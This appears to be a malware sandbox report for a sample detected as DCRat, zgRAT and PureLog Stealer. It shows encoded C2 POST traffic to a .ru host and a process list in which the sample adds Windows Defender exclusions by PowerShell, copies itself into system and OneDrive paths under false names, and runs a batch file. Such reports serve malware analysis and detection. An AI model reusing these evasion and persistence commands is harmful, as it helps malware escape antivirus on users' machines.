                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    146 | 192.168.2.4 | 50154 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:30.416382074 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:30.766526937 CET1012OUTData Raw: 56 5f 5a 5d 53 5f 50 5d 5a 5f 52 51 54 5f 5b 5e 55 51 59 5a 51 5f 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V_Z]S_P]Z_RQT_[^UQYZQ_R_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%X,*?$^(3*!?=:_$8Y4???[-6/ $.^&'X$.Q-2
                                                                    Nov 6, 2024 03:39:31.236835003 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:31.323147058 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    147 | 192.168.2.4 | 50155 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:31.460841894 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:31.813360929 CET1012OUTData Raw: 56 55 5a 5b 53 58 50 5f 5a 5f 52 51 54 5f 5b 5b 55 57 59 5a 51 50 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VUZ[SXP_Z_RQT_[[UWYZQPRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/*W<8 +]=1?-]0;+#?2)>7,507729'X$.Q-2


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    148 | 192.168.2.4 | 50156 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:32.227446079 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1260
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:32.578998089 CET1260OUTData Raw: 56 53 5f 5f 56 5e 50 59 5a 5f 52 51 54 5a 5b 5c 55 5d 59 59 51 53 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VS__V^PYZ_RQTZ[\U]YYQSRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_;=+$X+$Z>1Y>='+#.<-+X-8_#*^&'X$.Q->
                                                                    Nov 6, 2024 03:39:33.039164066 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:33.118026018 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 14 2b 14 26 11 30 02 2c 54 3d 00 04 02 2b 23 3f 5b 3b 54 2b 00 28 30 38 58 2b 3b 2c 18 34 59 34 07 21 1c 03 1e 34 31 3b 13 28 11 21 5f 05 1d 39 5b 30 17 20 55 2a 32 2a 5e 29 37 09 1a 32 0e 05 1a 28 38 3a 5a 37 03 2a 52 25 00 0f 12 27 31 33 55 2a 24 39 5f 2c 3f 3b 56 26 00 2a 57 09 16 20 51 27 33 0d 11 28 32 3b 10 25 3e 32 00 26 39 3f 57 3d 3f 27 58 34 1d 36 17 29 33 34 00 21 27 00 1e 27 03 26 45 31 3e 02 0e 28 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: +&0,T=+#?[;T+(08X+;,4Y4!41;(!_9[0 U*2*^)72(8:Z7*R%'13U*$9_,?;V&*W Q'3(2;%>2&9?W=?'X46)34!''&E1>("&U" T0]O


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    149 | 192.168.2.4 | 50157 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:32.227725983 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:32.578999996 CET1012OUTData Raw: 56 55 5f 5c 56 58 50 5b 5a 5f 52 51 54 5c 5b 5b 55 55 59 56 51 57 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VU_\VXP[Z_RQT\[[UUYVQWR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\,<5<(X>#*X>-&['(#7.(-#X:%37:]%'X$.Q->
                                                                    Nov 6, 2024 03:39:33.062787056 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:33.165800095 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP



                                                                    Target ID:0
                                                                    Start time:21:36:55
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0xdf0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"
                                                                    Imagebase:0x7ff701200000
                                                                    File size:2'759'232 bytes
                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"
                                                                    Imagebase:0x7ff682250000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:7
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:11
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:13
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:15
                                                                    Start time:21:36:58
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:16
                                                                    Start time:21:36:59
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat"
                                                                    Imagebase:0x7ff707720000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:21:36:59
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:21:36:59
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\chcp.com
                                                                    Wow64 process (32bit):false
                                                                    Commandline:chcp 65001
                                                                    Imagebase:0x7ff7db430000
                                                                    File size:14'848 bytes
                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:21:37:01
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\PING.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:ping -n 10 localhost
                                                                    Imagebase:0x7ff77fea0000
                                                                    File size:22'528 bytes
                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:21:37:06
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x7ff693ab0000
                                                                    File size:496'640 bytes
                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:21
                                                                    Start time:21:37:10
                                                                    Start date:05/11/2024
                                                                    Path:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0x7c0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 66%, ReversingLabs
                                                                    • Detection: 53%, Virustotal, Browse
                                                                    Has exited:false

                                                                    Target ID:22
                                                                    Start time:21:37:10
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0xe50000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 66%, ReversingLabs
                                                                    • Detection: 53%, Virustotal, Browse
                                                                    Has exited:true

                                                                    Target ID:24
                                                                    Start time:21:37:15
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff6eef20000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:25
                                                                    Start time:21:37:18
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0xda0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:21:37:27
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0x140000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:29
                                                                    Start time:21:37:35
                                                                    Start date:05/11/2024
                                                                    Path:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0x5e0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:30
                                                                    Start time:21:37:44
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0xc80000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:31
                                                                    Start time:21:37:53
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0x480000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:32
                                                                    Start time:21:38:02
                                                                    Start date:05/11/2024
                                                                    Path:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0xfe0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:33
                                                                    Start time:21:38:10
                                                                    Start date:05/11/2024
                                                                    Path:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                                    Imagebase:0x470000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:34
                                                                    Start time:21:38:19
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                                    Imagebase:0x8e0000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:36
                                                                    Start time:21:38:27
                                                                    Start date:05/11/2024
                                                                    Path:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0x50000
                                                                    File size:1'719'296 bytes
                                                                    MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:37
                                                                    Start time:21:38:35
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                                    Imagebase:0xf60000
                                                                    File size:1'719'296 bytes
